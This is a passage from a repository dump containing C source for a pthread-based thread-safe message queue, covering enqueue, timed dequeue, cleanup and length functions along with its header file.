pthread_mutex_lock(&queue->mutex); 77 | newmsg = get_msglist(queue); 78 | if (newmsg == NULL) { 79 | pthread_mutex_unlock(&queue->mutex); 80 | return ENOMEM; 81 | } 82 | newmsg->msg.data = data; 83 | newmsg->msg.msgtype = msgtype; 84 | 85 | newmsg->next = NULL; 86 | if (queue->last == NULL) { 87 | queue->last = newmsg; 88 | queue->first = newmsg; 89 | } else { 90 | queue->last->next = newmsg; 91 | queue->last = newmsg; 92 | } 93 | 94 | if(queue->length == 0) 95 | pthread_cond_broadcast(&queue->cond); 96 | queue->length++; 97 | pthread_mutex_unlock(&queue->mutex); 98 | 99 | return 0; 100 | 101 | } 102 | 103 | int thread_queue_get(struct threadqueue *queue, const struct timespec *timeout, struct threadmsg *msg) 104 | { 105 | struct msglist *firstrec; 106 | int ret = 0; 107 | struct timespec abstimeout; 108 | 109 | if (queue == NULL || msg == NULL) { 110 | printf("here\n"); 111 | return EINVAL; 112 | } 113 | if (timeout) { 114 | struct timeval now; 115 | 116 | gettimeofday(&now, NULL); 117 | abstimeout.tv_sec = now.tv_sec + timeout->tv_sec; 118 | abstimeout.tv_nsec = (now.tv_usec * 1000) + timeout->tv_nsec; 119 | if (abstimeout.tv_nsec >= 1000000000) { 120 | abstimeout.tv_sec++; 121 | abstimeout.tv_nsec -= 1000000000; 122 | } 123 | } 124 | 125 | pthread_mutex_lock(&queue->mutex); 126 | 127 | /* Will wait until awakened by a signal or broadcast */ 128 | while (queue->first == NULL && ret != ETIMEDOUT) { //Need to loop to handle spurious wakeups 129 | if (timeout) { 130 | ret = pthread_cond_timedwait(&queue->cond, &queue->mutex, &abstimeout); 131 | } else { 132 | pthread_cond_wait(&queue->cond, &queue->mutex); 133 | 134 | } 135 | } 136 | if (ret == ETIMEDOUT) { 137 | pthread_mutex_unlock(&queue->mutex); 138 | return ret; 139 | } 140 | 141 | firstrec = queue->first; 142 | queue->first = queue->first->next; 143 | queue->length--; 144 | 145 | if (queue->first == NULL) { 146 | queue->last = NULL; // we know this since we hold the lock 147 | queue->length = 0; 148 | } 149 | 150 | 151 | msg->data = firstrec->msg.data; 152 | msg->msgtype = firstrec->msg.msgtype; 153 | msg->qlength = queue->length; 154 | 155 | release_msglist(queue,firstrec); 156 | pthread_mutex_unlock(&queue->mutex); 157 | 158 | return 0; 159 | } 160 | 161 | int thread_queue_cleanup(struct threadqueue *queue, int freedata) 162 | { 163 | struct msglist *rec; 164 | struct msglist *next; 165 | struct msglist *recs[2]; 166 | int ret,i; 167 | if (queue == NULL) { 168 | return EINVAL; 169 | } 170 | 171 | pthread_mutex_lock(&queue->mutex); 172 | recs[0] = queue->first; 173 | recs[1] = queue->msgpool; 174 | for(i = 0; i < 2 ; i++) { 175 | rec = recs[i]; 176 | while (rec) { 177 | next = rec->next; 178 | if (freedata) { 179 | free(rec->msg.data); 180 | } 181 | free(rec); 182 | rec = next; 183 | } 184 | } 185 | 186 | pthread_mutex_unlock(&queue->mutex); 187 | ret = pthread_mutex_destroy(&queue->mutex); 188 | pthread_cond_destroy(&queue->cond); 189 | 190 | return ret; 191 | 192 | } 193 | 194 | long thread_queue_length(struct threadqueue *queue) 195 | { 196 | long counter; 197 | // get the length properly 198 | pthread_mutex_lock(&queue->mutex); 199 | counter = queue->length; 200 | pthread_mutex_unlock(&queue->mutex); 201 | return counter; 202 | 203 | } 204 | -------------------------------------------------------------------------------- /tqueue.h: -------------------------------------------------------------------------------- 1 | #ifndef _THREADQUEUE_H_ 2 | #define _THREADQUEUE_H_ 3 | 4 | #include 5 | 6 | struct threadmsg { 7 | void *data; 8 | long msgtype; 9 | long qlength; 10 | }; 11 | 12 | struct threadqueue { 13 | long length; 14 | pthread_mutex_t mutex; 15 | pthread_cond_t cond; 16 | struct msglist *first,*last; 17 | struct msglist *msgpool; 18 | long msgpool_length; 19 | }; 20 | 21 | int thread_queue_init(struct threadqueue *queue); 22 | int thread_queue_add(struct threadqueue *queue, void *data, long msgtype); 23 | int thread_queue_get(struct threadqueue *queue, const struct timespec *timeout, struct threadmsg *msg); 24 | long thread_queue_length( struct threadqueue *queue ); 25 | int thread_queue_cleanup(struct threadqueue *queue, int freedata); 26 | 27 | #endif 28 | --------------------------------------------------------------------------------